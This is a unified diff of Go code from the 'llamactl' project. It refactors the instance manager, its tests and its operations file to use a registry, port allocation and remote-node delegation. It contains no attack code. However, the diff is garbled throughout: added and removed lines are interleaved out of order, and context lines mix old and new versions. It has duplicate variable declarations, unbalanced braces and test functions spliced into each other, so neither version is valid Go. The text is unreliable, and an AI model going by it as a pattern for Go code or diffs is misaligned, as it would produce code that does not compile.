+	// Auto-start instances that have auto-restart enabled
-		go im.autoStartInstances()
+	go im.autoStartInstances()
 	}
 	return nil
 }
-// loadInstance loads a single instance from its JSON file
+// loadInstance loads a single persisted instance and adds it to the registry
-func (im *instanceManager) loadInstance(name, path string) error {
+func (im *instanceManager) loadInstance(persistedInst *instance.Instance) error {
-	data, err := os.ReadFile(path)
+	name := persistedInst.Name
-	if err != nil {
+	options := persistedInst.GetOptions()
-		return fmt.Errorf("failed to read instance file: %w", err)
+
 	// Check if this is a remote instance (local node not in the Nodes set)
 	var isRemote bool
 	var nodeName string
 	if options != nil {
 		if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
 			// Get the first node from the set
 			for node := range options.Nodes {
 				nodeName = node
 				isRemote = true
 				break
 			}
 		}
 	}
-	var persistedInstance instance.Process
+	var statusCallback func(oldStatus, newStatus instance.Status)
-	if err := json.Unmarshal(data, &persistedInstance); err != nil {
+	if !isRemote {
-		return fmt.Errorf("failed to unmarshal instance: %w", err)
+		// Only set status callback for local instances
-	}
+		statusCallback = func(oldStatus, newStatus instance.Status) {
-
+			im.onStatusChange(name, oldStatus, newStatus)
-	// Validate the instance name matches the filename
+		}
 	if persistedInstance.Name != name {
 		return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
 	}
 	statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
 		im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
 	}
 	// Create new inst using NewInstance (handles validation, defaults, setup)
-	inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
+	inst := instance.New(name, im.globalConfig, options, statusCallback)
 	// Restore persisted fields that NewInstance doesn't set
-	inst.Created = persistedInstance.Created
+	inst.Created = persistedInst.Created
-	inst.SetStatus(persistedInstance.Status)
+	inst.SetStatus(persistedInst.GetStatus())
-	// Check for port conflicts and add to maps
+	// Handle remote instance mapping
-	if inst.GetPort() > 0 {
+	if isRemote {
-		port := inst.GetPort()
+		// Map instance to node in remote manager
-		if im.ports[port] {
+		if err := im.remote.setInstanceNode(name, nodeName); err != nil {
-			return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
+			return fmt.Errorf("failed to set instance node: %w", err)
 		}
 	} else {
 		// Allocate port for local instances
 		if inst.GetPort() > 0 {
 			port := inst.GetPort()
 			if err := im.ports.allocateSpecific(port, name); err != nil {
 				return fmt.Errorf("port conflict: instance %s wants port %d which is already in use: %w", name, port, err)
 			}
 		}
 		im.ports[port] = true
 	}
-	im.instances[name] = inst
+	// Add instance to registry
 	if err := im.registry.add(inst); err != nil {
 		return fmt.Errorf("failed to add instance to registry: %w", err)
 	}
 	return nil
 }
 // autoStartInstances starts instances that were running when persisted and have auto-restart enabled
 // For instances with auto-restart disabled, it sets their status to Stopped
 func (im *instanceManager) autoStartInstances() {
-	im.mu.RLock()
+	instances := im.registry.list()
-	var instancesToStart []*instance.Process
+
-	for _, inst := range im.instances {
+	var instancesToStart []*instance.Instance
 	var instancesToStop []*instance.Instance
 	for _, inst := range instances {
 		if inst.IsRunning() && // Was running when persisted
 			inst.GetOptions() != nil &&
-			inst.GetOptions().AutoRestart != nil &&
+			inst.GetOptions().AutoRestart != nil {
-			*inst.GetOptions().AutoRestart {
+			if *inst.GetOptions().AutoRestart {
-			instancesToStart = append(instancesToStart, inst)
+				instancesToStart = append(instancesToStart, inst)
 			} else {
 				// Instance was running but auto-restart is disabled, mark as stopped
 				instancesToStop = append(instancesToStop, inst)
 			}
 		}
 	}
 	im.mu.RUnlock()
 	// Stop instances that have auto-restart disabled
 	for _, inst := range instancesToStop {
 		log.Printf("Instance %s was running but auto-restart is disabled, setting status to stopped", inst.Name)
 		inst.SetStatus(instance.Stopped)
 		im.registry.markStopped(inst.Name)
 	}
 	// Start instances that have auto-restart enabled
 	for _, inst := range instancesToStart {
 		log.Printf("Auto-starting instance %s", inst.Name)
 		// Reset running state before starting (since Start() expects stopped instance)
 		inst.SetStatus(instance.Stopped)
-		if err := inst.Start(); err != nil {
+		im.registry.markStopped(inst.Name)
-			log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
+
 		// Check if this is a remote instance
 		if node, exists := im.remote.getNodeForInstance(inst.Name); exists && node != nil {
 			// Remote instance - use remote manager with context
 			ctx := context.Background()
 			if _, err := im.remote.startInstance(ctx, node, inst.Name); err != nil {
 				log.Printf("Failed to auto-start remote instance %s: %v", inst.Name, err)
 			}
 		} else {
 			// Local instance - call Start() directly
 			if err := inst.Start(); err != nil {
 				log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
 			}
 		}
 	}
 }
-func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
+func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.Status) {
 	im.mu.Lock()
 	defer im.mu.Unlock()
 	if newStatus == instance.Running {
-		im.runningInstances[name] = struct{}{}
+		im.registry.markRunning(name)
 	} else {
-		delete(im.runningInstances, name)
+		im.registry.markStopped(name)
 	}
 }
 // getNodeForInstance looks up the node configuration mapped to a remote instance.
 // It returns nil when the instance is not remote or when the remote manager
 // has no node mapping for the instance's name.
 func (im *instanceManager) getNodeForInstance(inst *instance.Instance) *config.NodeConfig {
 	if inst.IsRemote() {
 		// Only remote instances are looked up in the remote manager's mapping
 		if node, found := im.remote.getNodeForInstance(inst.Name); found {
 			return node
 		}
 	}
 	return nil
 }
 // lockInstance returns the mutex associated with the given instance name,
 // storing a new one in instanceLocks if none exists yet. The mutex is returned
 // as-is: this function does not acquire it, so locking is left to the caller.
 // Per-name mutexes allow concurrent operations on different instances while
 // preventing concurrent operations on the same instance.
 func (im *instanceManager) lockInstance(name string) *sync.Mutex {
 	entry, _ := im.instanceLocks.LoadOrStore(name, new(sync.Mutex))
 	return entry.(*sync.Mutex)
 }
 // unlockAndCleanup releases the mutex stored for the given instance name and
 // then removes its entry from instanceLocks. It does nothing when no mutex is
 // stored under that name.
 // This should only be called when deleting an instance to prevent memory leaks.
 func (im *instanceManager) unlockAndCleanup(name string) {
 	entry, found := im.instanceLocks.Load(name)
 	if !found {
 		return
 	}
 	entry.(*sync.Mutex).Unlock()
 	im.instanceLocks.Delete(name)
 }
--- a/pkg/manager/manager_test.go
+++ b/pkg/manager/manager_test.go
@@ -3,70 +3,28 @@ package manager_test
 import (
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"os"
 	"path/filepath"
 	"strings"
 	"sync"
 	"testing"
 )
-func TestNewInstanceManager(t *testing.T) {
+func TestManager_PersistsAndLoadsInstances(t *testing.T) {
 	backendConfig := config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	cfg := config.InstancesConfig{
 		PortRange:            [2]int{8000, 9000},
 		LogsDir:              "/tmp/test",
 		MaxInstances:         5,
 		DefaultAutoRestart:   true,
 		DefaultMaxRestarts:   3,
 		DefaultRestartDelay:  5,
 		TimeoutCheckInterval: 5,
 	}
 	mgr := manager.NewInstanceManager(backendConfig, cfg)
 	if mgr == nil {
 		t.Fatal("NewInstanceManager returned nil")
 	}
 	// Test initial state
 	instances, err := mgr.ListInstances()
 	if err != nil {
 		t.Fatalf("ListInstances failed: %v", err)
 	}
 	if len(instances) != 0 {
 		t.Errorf("Expected empty instance list, got %d instances", len(instances))
 	}
 }
 func TestPersistence(t *testing.T) {
 	tempDir := t.TempDir()
 	appConfig := createTestAppConfig(tempDir)
-	backendConfig := config.BackendConfig{
+	// Create instance and check file was created
-		LlamaExecutable: "llama-server",
+	manager1 := manager.New(appConfig)
-		MLXLMExecutable: "mlx_lm.server",
+	options := &instance.Options{
-	}
+		BackendOptions: backends.Options{
-
+			BackendType: backends.BackendTypeLlamaCpp,
-	cfg := config.InstancesConfig{
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		PortRange:            [2]int{8000, 9000},
+				Model: "/path/to/model.gguf",
-		InstancesDir:         tempDir,
+				Port:  8080,
-		MaxInstances:         10,
+			},
 		TimeoutCheckInterval: 5,
 	}
 	// Test instance persistence on creation
 	manager1 := manager.NewInstanceManager(backendConfig, cfg)
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
@@ -75,14 +33,13 @@ func TestPersistence(t *testing.T) {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Check that JSON file was created
 	expectedPath := filepath.Join(tempDir, "test-instance.json")
 	if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
 		t.Errorf("Expected persistence file %s to exist", expectedPath)
 	}
-	// Test loading instances from disk
+	// Load instances from disk
-	manager2 := manager.NewInstanceManager(backendConfig, cfg)
+	manager2 := manager.New(appConfig)
 	instances, err := manager2.ListInstances()
 	if err != nil {
 		t.Fatalf("ListInstances failed: %v", err)
@@ -93,15 +50,31 @@ func TestPersistence(t *testing.T) {
 	if instances[0].Name != "test-instance" {
 		t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
 	}
 }
-	// Test port map populated from loaded instances (port conflict should be detected)
+func TestDeleteInstance_RemovesPersistenceFile(t *testing.T) {
-	_, err = manager2.CreateInstance("new-instance", options) // Same port
+	tempDir := t.TempDir()
-	if err == nil || !strings.Contains(err.Error(), "port") {
+	appConfig := createTestAppConfig(tempDir)
-		t.Errorf("Expected port conflict error, got: %v", err)
+
 	mgr := manager.New(appConfig)
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
-	// Test file deletion on instance deletion
+	_, err := mgr.CreateInstance("test-instance", options)
-	err = manager2.DeleteInstance("test-instance")
+	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	expectedPath := filepath.Join(tempDir, "test-instance.json")
 	err = mgr.DeleteInstance("test-instance")
 	if err != nil {
 		t.Fatalf("DeleteInstance failed: %v", err)
 	}
@@ -124,10 +97,12 @@ func TestConcurrentAccess(t *testing.T) {
 		wg.Add(1)
 		go func(index int) {
 			defer wg.Done()
-			options := &instance.CreateInstanceOptions{
+			options := &instance.Options{
-				BackendType: backends.BackendTypeLlamaCpp,
+				BackendOptions: backends.Options{
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+					BackendType: backends.BackendTypeLlamaCpp,
-					Model: "/path/to/model.gguf",
+					LlamaServerOptions: &backends.LlamaServerOptions{
 						Model: "/path/to/model.gguf",
 					},
 				},
 			}
 			instanceName := fmt.Sprintf("concurrent-test-%d", index)
@@ -157,43 +132,58 @@ func TestConcurrentAccess(t *testing.T) {
 	}
 }
-func TestShutdown(t *testing.T) {
+// Helper functions for test configuration
-	mgr := createTestManager()
+func createTestAppConfig(instancesDir string) *config.AppConfig {
-
+	// Use 'sleep' as a test command instead of 'llama-server'
-	// Create test instance
+	// This allows tests to run in CI environments without requiring actual LLM binaries
-	options := &instance.CreateInstanceOptions{
+	// The sleep command will be invoked with model paths and other args, which it ignores
-		BackendType: backends.BackendTypeLlamaCpp,
+	return &config.AppConfig{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		Backends: config.BackendConfig{
-			Model: "/path/to/model.gguf",
+			LlamaCpp: config.BackendSettings{
 				Command: "sleep",
 			},
 			MLX: config.BackendSettings{
 				Command: "sleep",
 			},
 		},
 		Instances: config.InstancesConfig{
 			PortRange:            [2]int{8000, 9000},
 			InstancesDir:         instancesDir,
 			LogsDir:              instancesDir,
 			MaxInstances:         10,
 			MaxRunningInstances:  10,
 			DefaultAutoRestart:   true,
 			DefaultMaxRestarts:   3,
 			DefaultRestartDelay:  5,
 			TimeoutCheckInterval: 5,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]config.NodeConfig{},
 	}
 	_, err := mgr.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Shutdown should not panic
 	mgr.Shutdown()
 	// Multiple shutdowns should not panic
 	mgr.Shutdown()
 }
 // Helper function to create a test manager with standard config
 func createTestManager() manager.InstanceManager {
-	backendConfig := config.BackendConfig{
+	appConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "sleep",
 			},
 			MLX: config.BackendSettings{
 				Command: "sleep",
 			},
 		},
 		Instances: config.InstancesConfig{
 			PortRange:            [2]int{8000, 9000},
 			LogsDir:              "/tmp/test",
 			MaxInstances:         10,
 			MaxRunningInstances:  10,
 			DefaultAutoRestart:   true,
 			DefaultMaxRestarts:   3,
 			DefaultRestartDelay:  5,
 			TimeoutCheckInterval: 5,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]config.NodeConfig{},
 	}
-
+	return manager.New(appConfig)
 	cfg := config.InstancesConfig{
 		PortRange:            [2]int{8000, 9000},
 		LogsDir:              "/tmp/test",
 		MaxInstances:         10,
 		DefaultAutoRestart:   true,
 		DefaultMaxRestarts:   3,
 		DefaultRestartDelay:  5,
 		TimeoutCheckInterval: 5,
 	}
 	return manager.NewInstanceManager(backendConfig, cfg)
 }
--- a/pkg/manager/operations.go
+++ b/pkg/manager/operations.go
@@ -1,159 +1,350 @@
 package manager
 import (
 	"context"
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
-	"llamactl/pkg/validation"
+	"log"
 	"os"
 	"path/filepath"
 )
 type MaxRunningInstancesError error
-// ListInstances returns a list of all instances managed by the instance manager.
+// updateLocalInstanceFromRemote updates the local stub instance with data from the remote instance
-func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
+func (im *instanceManager) updateLocalInstanceFromRemote(localInst *instance.Instance, remoteInst *instance.Instance) {
-	im.mu.RLock()
+	if localInst == nil || remoteInst == nil {
-	defer im.mu.RUnlock()
+		return
 	instances := make([]*instance.Process, 0, len(im.instances))
 	for _, inst := range im.instances {
 		instances = append(instances, inst)
 	}
 	remoteOptions := remoteInst.GetOptions()
 	if remoteOptions == nil {
 		return
 	}
 	// Update the local instance with all remote data
 	localInst.SetOptions(remoteOptions)
 	localInst.SetStatus(remoteInst.GetStatus())
 	localInst.Created = remoteInst.Created
 }
 // ListInstances returns a list of all instances managed by the instance manager.
 // For remote instances, this fetches the live state from remote nodes and updates local stubs.
 func (im *instanceManager) ListInstances() ([]*instance.Instance, error) {
 	instances := im.registry.list()
 	// Update remote instances with live state
 	ctx := context.Background()
 	for _, inst := range instances {
 		if node := im.getNodeForInstance(inst); node != nil {
 			remoteInst, err := im.remote.getInstance(ctx, node, inst.Name)
 			if err != nil {
 				// Log error but continue with stale data
 				// Don't fail the entire list operation due to one remote failure
 				continue
 			}
 			// Update the local stub with all remote data (preserving Nodes)
 			im.updateLocalInstanceFromRemote(inst, remoteInst)
 		}
 	}
 	return instances, nil
 }
 // CreateInstance creates a new instance with the given options and returns it.
 // The instance is initially in a "stopped" state.
-func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
+func (im *instanceManager) CreateInstance(name string, options *instance.Options) (*instance.Instance, error) {
 	if options == nil {
 		return nil, fmt.Errorf("instance options cannot be nil")
 	}
-	name, err := validation.ValidateInstanceName(name)
+	err := options.BackendOptions.ValidateInstanceOptions()
 	if err != nil {
 		return nil, err
 	}
-	err = validation.ValidateInstanceOptions(options)
+	// Check if instance with this name already exists (must be globally unique)
-	if err != nil {
+	if _, exists := im.registry.get(name); exists {
 		return nil, err
 	}
 	im.mu.Lock()
 	defer im.mu.Unlock()
 	// Check max instances limit after acquiring the lock
 	if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
 		return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
 	}
 	// Check if instance with this name already exists
 	if im.instances[name] != nil {
 		return nil, fmt.Errorf("instance with name %s already exists", name)
 	}
-	// Assign and validate port for backend-specific options
+	// Check if this is a remote instance (local node not in the Nodes set)
-	if err := im.assignAndValidatePort(options); err != nil {
+	if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
-		return nil, err
+		// Get the first node from the set
 		var nodeName string
 		for node := range options.Nodes {
 			nodeName = node
 			break
 		}
 		// Create the remote instance on the remote node
 		ctx := context.Background()
 		nodeConfig, exists := im.remote.getNodeForInstance(nodeName)
 		if !exists {
 			// Try to set the node if it doesn't exist yet
 			if err := im.remote.setInstanceNode(name, nodeName); err != nil {
 				return nil, fmt.Errorf("node %s not found", nodeName)
 			}
 			nodeConfig, _ = im.remote.getNodeForInstance(name)
 		}
 		remoteInst, err := im.remote.createInstance(ctx, nodeConfig, name, options)
 		if err != nil {
 			return nil, err
 		}
 		// Create a local stub that preserves the Nodes field for tracking
 		// We keep the original options (with Nodes) so IsRemote() works correctly
 		inst := instance.New(name, im.globalConfig, options, nil)
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		// Map instance to node
 		if err := im.remote.setInstanceNode(name, nodeName); err != nil {
 			return nil, fmt.Errorf("failed to map instance to node: %w", err)
 		}
 		// Add to registry (doesn't count towards local limits)
 		if err := im.registry.add(inst); err != nil {
 			return nil, fmt.Errorf("failed to add instance to registry: %w", err)
 		}
 		// Persist the remote instance locally for tracking across restarts
 		if err := im.persistInstance(inst); err != nil {
 			// Rollback: remove from registry
 			im.registry.remove(name)
 			return nil, fmt.Errorf("failed to persist remote instance %s: %w", name, err)
 		}
 		return inst, nil
 	}
-	statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
+	// Local instance creation
 	// Check max instances limit for local instances only
 	totalInstances := im.registry.count()
 	remoteCount := 0
 	for _, inst := range im.registry.list() {
 		if inst.IsRemote() {
 			remoteCount++
 		}
 	}
 	localInstanceCount := totalInstances - remoteCount
 	if localInstanceCount >= im.globalConfig.Instances.MaxInstances && im.globalConfig.Instances.MaxInstances != -1 {
 		return nil, fmt.Errorf("maximum number of instances (%d) reached", im.globalConfig.Instances.MaxInstances)
 	}
 	// Assign and validate port for backend-specific options
 	currentPort := im.getPortFromOptions(options)
 	var allocatedPort int
 	if currentPort == 0 {
 		// Allocate a port if not specified
 		allocatedPort, err = im.ports.allocate(name)
 		if err != nil {
 			return nil, fmt.Errorf("failed to allocate port: %w", err)
 		}
 		im.setPortInOptions(options, allocatedPort)
 	} else {
 		// Use the specified port
 		if err := im.ports.allocateSpecific(currentPort, name); err != nil {
 			return nil, fmt.Errorf("port %d is already in use: %w", currentPort, err)
 		}
 		allocatedPort = currentPort
 	}
 	statusCallback := func(oldStatus, newStatus instance.Status) {
 		im.onStatusChange(name, oldStatus, newStatus)
 	}
-	inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
+	inst := instance.New(name, im.globalConfig, options, statusCallback)
 	im.instances[inst.Name] = inst
 	// Add to registry
 	if err := im.registry.add(inst); err != nil {
 		// Rollback: release port
 		im.ports.release(allocatedPort)
 		return nil, fmt.Errorf("failed to add instance to registry: %w", err)
 	}
 	// Persist instance (best-effort, don't fail if persistence fails)
 	if err := im.persistInstance(inst); err != nil {
-		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
+		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	}
 	return inst, nil
 }
 // GetInstance retrieves an instance by its name.
-func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
+// For remote instances, this fetches the live state from the remote node and updates the local stub.
-	im.mu.RLock()
+func (im *instanceManager) GetInstance(name string) (*instance.Instance, error) {
-	defer im.mu.RUnlock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	return instance, nil
+
 	// Check if instance is remote and fetch live state
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.getInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		// Return the local stub (preserving Nodes field)
 		return inst, nil
 	}
 	return inst, nil
 }
 // UpdateInstance updates the options of an existing instance and returns it.
 // If the instance is running, it will be restarted to apply the new options.
-func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
+func (im *instanceManager) UpdateInstance(name string, options *instance.Options) (*instance.Instance, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	im.mu.RUnlock()
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
 	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.updateInstance(ctx, node, name, options)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		// Persist the updated remote instance locally
 		if err := im.persistInstance(inst); err != nil {
 			return nil, fmt.Errorf("failed to persist updated remote instance %s: %w", name, err)
 		}
 		return inst, nil
 	}
 	if options == nil {
 		return nil, fmt.Errorf("instance options cannot be nil")
 	}
-	err := validation.ValidateInstanceOptions(options)
+	err := options.BackendOptions.ValidateInstanceOptions()
 	if err != nil {
 		return nil, err
 	}
 	// Lock this specific instance only
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Handle port changes
 	oldPort := inst.GetPort()
 	newPort := im.getPortFromOptions(options)
 	var allocatedPort int
 	if newPort != oldPort {
 		// Port is changing - need to release old and allocate new
 		if newPort == 0 {
 			// Auto-allocate new port
 			allocatedPort, err = im.ports.allocate(name)
 			if err != nil {
 				return nil, fmt.Errorf("failed to allocate new port: %w", err)
 			}
 			im.setPortInOptions(options, allocatedPort)
 		} else {
 			// Use specified port
 			if err := im.ports.allocateSpecific(newPort, name); err != nil {
 				return nil, fmt.Errorf("failed to allocate port %d: %w", newPort, err)
 			}
 			allocatedPort = newPort
 		}
 		// Release old port
 		if oldPort > 0 {
 			if err := im.ports.release(oldPort); err != nil {
 				// Rollback new port allocation
 				im.ports.release(allocatedPort)
 				return nil, fmt.Errorf("failed to release old port %d: %w", oldPort, err)
 			}
 		}
 	}
 	// Check if instance is running before updating options
-	wasRunning := instance.IsRunning()
+	wasRunning := inst.IsRunning()
 	// If the instance is running, stop it first
 	if wasRunning {
-		if err := instance.Stop(); err != nil {
+		if err := inst.Stop(); err != nil {
 			return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
 		}
 	}
 	// Now update the options while the instance is stopped
-	instance.SetOptions(options)
+	inst.SetOptions(options)
 	// If it was running before, start it again with the new options
 	if wasRunning {
-		if err := instance.Start(); err != nil {
+		if err := inst.Start(); err != nil {
 			return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
 		}
 	}
-	im.mu.Lock()
+	if err := im.persistInstance(inst); err != nil {
 	defer im.mu.Unlock()
 	if err := im.persistInstance(instance); err != nil {
 		return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
 	}
-	return instance, nil
+	return inst, nil
 }
 // DeleteInstance removes stopped instance by its name.
 func (im *instanceManager) DeleteInstance(name string) error {
-	im.mu.Lock()
+	inst, exists := im.registry.get(name)
 	defer im.mu.Unlock()
 	instance, exists := im.instances[name]
 	if !exists {
 		return fmt.Errorf("instance with name %s not found", name)
 	}
-	if instance.IsRunning() {
+	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		err := im.remote.deleteInstance(ctx, node, name)
 		if err != nil {
 			return err
 		}
 		// Clean up local tracking
 		im.remote.removeInstance(name)
 		im.registry.remove(name)
 		// Delete the instance's persistence file
 		if err := im.persistence.delete(name); err != nil {
 			return fmt.Errorf("failed to delete config file for remote instance %s: %w", name, err)
 		}
 		return nil
 	}
 	// Lock this specific instance and clean up the lock on completion
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer im.unlockAndCleanup(name)
 	if inst.IsRunning() {
 		return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
 	}
-	delete(im.ports, instance.GetPort())
+	// Release port (use ReleaseByInstance for proper cleanup)
-	delete(im.instances, name)
+	im.ports.releaseByInstance(name)
-	// Delete the instance's config file if persistence is enabled
+	// Remove from registry
-	instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
+	if err := im.registry.remove(name); err != nil {
-	if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
+		return fmt.Errorf("failed to remove instance from registry: %w", err)
-		return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
+	}
 	// Delete persistence file
 	if err := im.persistence.delete(name); err != nil {
 		return fmt.Errorf("failed to delete config file for instance %s: %w", name, err)
 	}
 	return nil
@@ -161,156 +352,186 @@ func (im *instanceManager) DeleteInstance(name string) error {
 // StartInstance starts a stopped instance and returns it.
 // If the instance is already running, it returns an error.
-func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
+func (im *instanceManager) StartInstance(name string) (*instance.Instance, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
 	im.mu.RUnlock()
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	if instance.IsRunning() {
+
-		return instance, fmt.Errorf("instance with name %s is already running", name)
+	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.startInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		return inst, nil
 	}
-	if maxRunningExceeded {
+	// Lock this specific instance only
-		return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
+	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Idempotent: if already running, just return success
 	if inst.IsRunning() {
 		return inst, nil
 	}
-	if err := instance.Start(); err != nil {
+	// Check max running instances limit for local instances only
 	if im.IsMaxRunningInstancesReached() {
 		return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.globalConfig.Instances.MaxRunningInstances))
 	}
 	if err := inst.Start(); err != nil {
 		return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
 	}
-	im.mu.Lock()
+	// Persist instance (best-effort, don't fail if persistence fails)
-	defer im.mu.Unlock()
+	if err := im.persistInstance(inst); err != nil {
-	err := im.persistInstance(instance)
+		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	if err != nil {
 		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
 	}
-	return instance, nil
+	return inst, nil
 }
 func (im *instanceManager) IsMaxRunningInstancesReached() bool {
-	im.mu.RLock()
+	if im.globalConfig.Instances.MaxRunningInstances == -1 {
-	defer im.mu.RUnlock()
+		return false
 	if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
 		return true
 	}
-	return false
+	// Count only local running instances (each node has its own limits)
 	localRunningCount := 0
 	for _, inst := range im.registry.listRunning() {
 		if !inst.IsRemote() {
 			localRunningCount++
 		}
 	}
 	return localRunningCount >= im.globalConfig.Instances.MaxRunningInstances
 }
 // StopInstance stops a running instance and returns it.
-func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
+func (im *instanceManager) StopInstance(name string) (*instance.Instance, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	im.mu.RUnlock()
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	if !instance.IsRunning() {
+
-		return instance, fmt.Errorf("instance with name %s is already stopped", name)
+	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.stopInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		return inst, nil
 	}
-	if err := instance.Stop(); err != nil {
+	// Lock this specific instance only
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Idempotent: if already stopped, just return success
 	if !inst.IsRunning() {
 		return inst, nil
 	}
 	if err := inst.Stop(); err != nil {
 		return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
 	}
-	im.mu.Lock()
+	// Persist instance (best-effort, don't fail if persistence fails)
-	defer im.mu.Unlock()
+	if err := im.persistInstance(inst); err != nil {
-	err := im.persistInstance(instance)
+		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	if err != nil {
 		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
 	}
-	return instance, nil
+	return inst, nil
 }
 // RestartInstance stops and then starts an instance, returning the updated instance.
-func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
+func (im *instanceManager) RestartInstance(name string) (*instance.Instance, error) {
-	instance, err := im.StopInstance(name)
